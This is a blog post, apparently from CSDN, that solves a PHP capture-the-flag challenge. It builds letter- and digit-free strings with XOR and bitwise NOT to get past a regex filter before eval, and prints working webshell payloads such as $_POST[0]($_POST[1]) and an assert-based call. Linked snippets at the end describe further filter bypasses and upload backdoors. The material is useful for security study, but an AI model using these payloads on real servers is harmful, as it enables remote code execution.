PHP无字母数字构造Webshell

最新推荐文章于 2025-06-04 11:00:24 发布
原创 最新推荐文章于 2025-06-04 11:00:24 发布 · 1.8k 阅读 · 3 ·
CC 4.0 BY-SA版权
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
文章标签:

#php

本文详细解析了一项PHP代码注入挑战,通过巧妙利用字符异或运算及字符串拼接技巧,成功绕过正则表达式的限制,实现了特定函数的调用。文章展示了如何构造特殊字符串以调用预定义函数,获取flag,并提供了多种实现方案,包括webshell和不同类型的答案。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

题目

index.php:
<?php
include 'flag.php';
if(isset($_GET['code'])){
    $code = $_GET['code'];
    if(strlen($code)>40){ //检测字符长度
        die("Long.");
    }
    if(preg_match("/[A-Za-z0-9]+/",$code)){ //限制字母和数字
        die("NO.");
    }
    @eval($code); //$code的值要为非字母和数字
}else{
    highlight_file(__FILE__);
}
//$hint =  "php function getFlag() to get flag";
?>

flag.php:

<?php
	function getFlag(){
		$flag = "flag is here";
		echo $flag;
};
?>

解题过程

方法一

在PHP中,两个字符串执行异或操作以后,得到的还是一个字符串。所以,我们想得到a-z中某个字母,就找到某两个非字母、数字的字符,他们的异或结果是这个字母即可。

<?php
    var_dump('#'^'|'); //得到字符 _
    var_dump('.'^'~'); //得到字符 P
	var_dump('/'^'`'); //得到字符 0
	var_dump('|'^'/'); //得到字符 S
	var_dump('{'^'/'); //得到字符 T
	$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/");
	//变量$__值为字符串'_POST'
?>

websell:

<?php
@$_++; //$_=NULL=0  $_++=1
$__=("#"^"|").("."^"~").("/"^"`").("|"^"/").("{"^"/"); //_POST
${$__}[!$_](${$__}[$_]); // $_POST[0]($_POST[1]);
?>

答案

$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=getFlag
    
$_="`{{{"^"?<>/"; //_GET
${$_}[_](${$_}[__]); //$_GET[_]($_GET[__])
&_=getFlag //执行函数 eval("getFlag(null)")

webshell:
$_="`{{{"^"?<>/";${$_}[_](${$_}[__]);&_=assert&__=phpinfo()

其他类型答案

如果在加上不能有&_字符呢?

只要eval函数执行了“getFlag()”字符串即可,那么绕过正则匹配即可:

把getFlag取反然后URL编码:

?code== _=~%98%9A%8B%B9%93%9E%98;= _();


这里为什么正则没有检测到,因为后端自动进行了解码,解码为非字母和数字字符,而eval执行了取反还原为getFlag字符。

既然可以利用取反~进行编码绕过正则检测,那么也可以取反编码GET、_POST。

参考链接 :https://blog.csdn.net/a15803617402/article/details/83589181

不用字母和数字构造webshell
weixin_46330722的博客
01-21 900
前言 最近做题的时候遇到了许多过滤了字母和数字的代码执行,参考了一些大佬的文章后,就想自己写一篇文章来总结一下不用字母和数字构造webshell的姿势。 测试代码 <?php $c=$_GET[1]; if(preg_match('/[0-9]|[a-z]/i',$c)){ die("error"); } eval($c); ?> 本文所总结的姿势均用此代码测试。 1 位运算 因为不能用字母数字,所以我们可以通过取反,或,异或等位运算利用特殊字符构造字母数字,再利用php
无字母绕过webshell
banliyaoguai的博客
08-13 852
但是抓取临时文件很难因为你上传上去后,没有接收文件,系统就会很快的删除掉你的文件,然后想要接收文件还需要知道文件名字,但是文件名是一个随机字符没有用办法接到。··反引号可以在eval中命令执行在这里的代码就是上面说的匹配上文件,再进行命令执行,然后由于这个是get传参所以需要需要进行url编码,然后就执行成功了。如果可以访问并执行临时文件,就可以进行命令执行了,我们在要上传的文件上写入你要执行的命令,如下图所示。在PHP7中我们可以使用('phpinfo')(),这样的代码执行,如下图。
字母数字webshell
m0_65429684的博客
04-22 1855
核心思路是,将非字母、数字的字符经过各种变换,最后能构造出a-z中任意一个字符。然后再利用PHP允许动态函数执行的特点,拼接处一个函数名,如“assert”,然后动态执行之即可。在此之前,我需要说说php5和7的差异。php5中assert是一个函数,我们可以通过$f='assert';$f(...);这样的方法来动态执行任意代码。但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。
php字母数字构造入门
不想去派出所
11-29 771
1 前置知识 1.1 php中的正则匹配函数 最常见的preg_grep() preg_grep(string $pattern, array $array, int $flags = 0): array|false 返回给定数组array中与模式pattern 匹配的元素组成的数组 其余的正则函数可以在https://www.runoob.com/php/php-pcre.html里学习 1.2 正则匹配式 正则表达式手册:https://tool.oschina.net/uploads/apidocs
字母数字webshell的命令执行
最新发布
guygg88的博客
06-04 525
字母数字WebShell是一种利用PHP等语言灵活特性的攻击手段,攻击者通过字符转换和编码技术绕过安全机制,执行恶意命令。然而,通过合理的防御措施,如禁用危险函数、使用WAF等,可以有效减少这种攻击带来的风险。在实践中,系统管理员应结合多种手段,提高服务器的安全性。
php {0110 &^ 1011 =,从一道CTF题目中学习新的无字母webshell构造
weixin_35460589的博客
03-20 389
前言前几天的RCTF2020中,有一道web题calc考察的是构造无字母的shell,非常有学习意义,这里跟各位师傅分享一下。本人菜鸟一枚,文章中如有不对的地方,望各位师傅指出,勿喷~~~题目分析error_reporting(0);if(!isset($_GET['num'])){show_source(__FILE__);}else{$str = $_GET['num'];$blacklist...
php5构造字母数字webshell实现任意命令执行
qq_68163788的博客
12-02 1669
Webshell是一种恶意软件,通常指的是通过网络渠道上传到受攻击的服务器上的一段可执行代码。它可以被用来获取对服务器的远程控制权限,执行各种操作包括文件管理、数据库访问、系统命令执行等。
Suctf知识记录&&PHP代码审计,无字母数字webshell
weixin_30892889的博客
09-14 1090
Checkin .user.ini构成php后门利用,设置auto_prepend_file=01.jpg,自动在文件前包含了01.jpg,利用.user.ini和图片马实现文件包含+图片马的利用..htacess构造后门是通过上传.htaccess设置AddType application/x-httpd-php .jpg,将jpg文件作为php解析,getshell Ea...
Web安全 _ 无字母数字Webshell 总结.pdf
09-06
PHP中的一些基础知识对于构造Webshell至关重要: 1. PHP短标签:PHP有三种标签形式,除了最常见的`<?php ... ?>`之外,还有`<? ... ?>`和`<?= ... ?>`。如果`php`关键字被过滤,可以使用其他两种短标签作为替代,...
字母数字webshell进阶收藏版1
08-03
【标题】:“无字母数字webshell进阶收藏版1” 【描述】:本文主要探讨了在Webshell中如何使用无字母数字的Unicode编码进行高级技巧的实现,包括原理、缩短和压榨三个部分。 【正文】: Webshell是一种用于远程...
如何通过非数字与字符的方式实现PHP WebShell详解
08-30
本文主要关注的是如何利用非字母和非数字字符,并通过PHP的动态函数功能来执行构造的代码。在PHP 5中,可以利用`assert`函数来实现这一目标,但在PHP 7中,由于`assert`成为语言结构,不能再作为函数名来动态执行...
命令执行-无字母数字webshell
leekos的博客,分享web安全相关知识~
12-26 2417
命令执行无字母数字webshell
php字母数字代码执行
m0_52432374的博客
04-30 450
字母数字RCE
yourdawntown的博客
09-06 2168
版本为php5 php5中assert是一个函数,我们可以通过f=′assert′;f='assert';f=′assert′;f(…);这样的方法来动态执行任意代码。 但php7中,assert不再是函数,变成了一个语言结构(类似eval),不能再作为函数名动态执行代码,所以利用起来稍微复杂一点。但也无需过于担心,比如我们利用file_put_contents函数,同样可以用来getshell。 无数字和字母rce 测试代码 <?php if(!preg_match('/[a-z0-9]/is',
关于php无字母代码的研究
weixin_33763244的博客
08-08 298
2019独角兽企业重金招聘Python工程师标准>>> ...
无数字字母rce总结(取反、异或、自增)
qq_45392044的博客
02-24 1192
成功获取到了字符Array,然后我们获取想获取A的话,就可以采用[0]这种方式来获取,但我们是不能够写数字的,所以我们这里可以用一个判断,比如我们在[]里加一个==,此时因为空和不同,它就会输出0,此时也就等同于_[0],具体实现代码如下。我们在构造POST中的时,正常操作的话是这样,a='_'.b(假设这里b就是POST),然后这个时候如果'被ban,看似这里是无法再利用了,但其实,我们直接写a=.b也是可以的,这个时候效果同上而且缩短了字符长度。什么是异或,我们这里举一个例子,我们将字符 A。
PHP代码注入详解
Zeker62的博客
08-16 6071
PHP代码注入的原理和解析 PHP代码注入靠的是RCE,即远程代码执行。 指应用程序过滤不严,hacker可以将代码注入到服务器进行远程的执行。 危害和SSRF相似,通过这个漏洞可以操控服务器的动作。 最典型的就是一句话木马。 PHP代码漏洞注入的两个要素: 程序中含有可执行的PHP代码函数 传入第一点的参数,客户端可控,直接修改或者影响 下面将对PHP相关函数和语句以及注入方法进行解释 eval() eval()函数在很多语言中都有,比如Python、PHP。 eval函数的作用是将字符串作为PHP
安恒双11活动题目
suddenlyTW的博客
11-12 1023
  由于是昨天的题目,今天链接已经无法点开了,所以通过其他大神的地方把题扣了过来 web1: 代码如下:   &lt;?php include 'flag.php'; if(isset($_GET['code'])){ $code = $_GET['code']; if(strlen($code)&gt;35){ die("Long."); } ...
深入理解无字母数字Webshell:绕过与执行策略
这在构造Webshell时可能会派上用场,特别是在需要执行系统命令的情况下。 理解和掌握无字母数字Webshell的概念以及相关的PHP特性,对于进行Web安全研究和防御具有重要意义。这涉及到字符编码、动态函数执行、PHP...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值